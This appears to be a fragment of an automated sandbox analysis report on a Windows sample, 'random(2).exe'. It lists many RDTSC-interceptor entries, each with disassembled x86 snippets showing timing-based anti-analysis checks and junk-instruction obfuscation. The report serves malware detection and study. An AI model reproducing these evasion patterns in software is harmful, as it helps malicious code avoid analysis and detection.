              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5A60A4 second address: 5A60C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEAE9 second address: 5DEAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEAEE second address: 5DEB06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F29453582E1h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEB06 second address: 5DEB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEC89 second address: 5DEC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEC8D second address: 5DECA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F2944535540h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEE4E second address: 5DEE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jno 00007F29453582D6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEE5F second address: 5DEE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF3ED second address: 5DF3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF3F2 second address: 5DF40F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535547h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF40F second address: 5DF41E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E1830 second address: 5E183A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E183A second address: 5E1857 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29453582DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jo 00007F29453582D6h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E19C6 second address: 5E19CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E22F0 second address: 5E2356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F29453582D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jl 00007F29453582E3h 0x0000002a pushad 0x0000002b jno 00007F29453582D6h 0x00000031 mov edi, 773FC64Fh 0x00000036 popad 0x00000037 nop 0x00000038 jmp 00007F29453582E2h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F29453582E5h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E2356 second address: 5E235B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E280D second address: 5E2811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E2811 second address: 5E281D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E281D second address: 5E2835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b nop 0x0000000c and esi, 291A9FCAh 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E2835 second address: 5E2839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E2D71 second address: 5E2D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E358A second address: 5E358E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E481C second address: 5E4822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E5203 second address: 5E5209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E5209 second address: 5E5222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E529E second address: 5E52A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E52A2 second address: 5E52B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F29453582D6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E5B2E second address: 5E5B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E5B34 second address: 5E5B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E68AD second address: 5E68B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E6645 second address: 5E6649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E6649 second address: 5E664F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7DAC second address: 5E7DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 jng 00007F29453582DCh 0x0000000c mov dword ptr [ebp+122D17A4h], ecx 0x00000012 push 00000000h 0x00000014 jmp 00007F29453582E6h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D1A1Ch], ebx 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7DE5 second address: 5E7DEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7DEB second address: 5E7E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F29453582E9h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E9891 second address: 5E9895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E9895 second address: 5E989F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E989F second address: 5E98A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2944535536h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E98A9 second address: 5E98AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EAE92 second address: 5EAE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ED0B1 second address: 5ED0B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EE241 second address: 5EE245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EF092 second address: 5EF0A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7B60 second address: 5E7B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7B67 second address: 5E7B71 instructions: 0x00000000 rdtsc 0x00000002 je 00007F29453582DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F01C2 second address: 5F01C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EB02D second address: 5EB031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EB031 second address: 5EB037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EC14F second address: 5EC173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29453582DAh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EC173 second address: 5EC179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F42B6 second address: 5F42BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F42BA second address: 5F42C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F42C0 second address: 5F4331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F29453582D8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 or bx, CEE5h 0x00000029 push 00000000h 0x0000002b mov di, BF00h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F29453582D8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b mov ebx, dword ptr [ebp+122D377Eh] 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EE4A9 second address: 5EE4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EE4AD second address: 5EE4B7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ED1FF second address: 5ED21B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ED21B second address: 5ED21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F5142 second address: 5F515B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535545h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F12CF second address: 5F12DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F29453582D6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F60F4 second address: 5F60F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F60F8 second address: 5F6151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F29453582D8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov bx, C51Ah 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F29453582D8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 xor dword ptr [ebp+122D31B8h], eax 0x0000004c cld 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F228E second address: 5F2298 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F2298 second address: 5F22C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F29453582EFh 0x00000010 jmp 00007F29453582E9h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F719E second address: 5F71A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F71A3 second address: 5F71D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F29453582E2h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F29453582E6h 0x00000014 pop edi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F52C4 second address: 5F52F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jmp 00007F2944535546h 0x00000019 pop edi 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F53A4 second address: 5F53B2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F53B2 second address: 5F53B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F53B6 second address: 5F53D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007F29453582E4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F53D3 second address: 5F53D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F623A second address: 5F62E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29453582D6h 0x0000000a popad 0x0000000b jmp 00007F29453582DAh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F29453582E0h 0x00000017 nop 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov edi, esi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F29453582D8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov dword ptr [ebp+122D1A1Ch], edi 0x00000048 mov dword ptr [ebp+122D1E41h], edx 0x0000004e mov eax, dword ptr [ebp+122D15DDh] 0x00000054 mov dword ptr [ebp+122D17B1h], edx 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push esi 0x0000005f call 00007F29453582D8h 0x00000064 pop esi 0x00000065 mov dword ptr [esp+04h], esi 0x00000069 add dword ptr [esp+04h], 0000001Ah 0x00000071 inc esi 0x00000072 push esi 0x00000073 ret 0x00000074 pop esi 0x00000075 ret 0x00000076 or dword ptr [ebp+122DB460h], eax 0x0000007c nop 0x0000007d push eax 0x0000007e push edx 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007F29453582DCh 0x00000086 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F62E5 second address: 5F62EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F62EB second address: 5F6305 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29453582DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F29453582D6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F6305 second address: 5F6313 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5FE7FB second address: 5FE807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F359D second address: 5F35A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604B96 second address: 604BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F29453582D6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604BA2 second address: 604BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604BA8 second address: 604BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29453582DEh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604BC3 second address: 604BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604BC7 second address: 604C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DAh 0x00000007 jmp 00007F29453582E9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F29453582D8h 0x00000014 pushad 0x00000015 popad 0x00000016 jns 00007F29453582DCh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604D88 second address: 604D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604D8C second address: 604DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F29453582D6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29453582E2h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604DB0 second address: 604DBA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2944535536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604F17 second address: 604F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F29453582E3h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F29453582E5h 0x00000018 pop ebx 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F29453582DAh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 607B9B second address: 607B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 60B001 second address: 60B00B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F29453582D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 60B092 second address: 60B098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 60B1EB second address: 60B1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
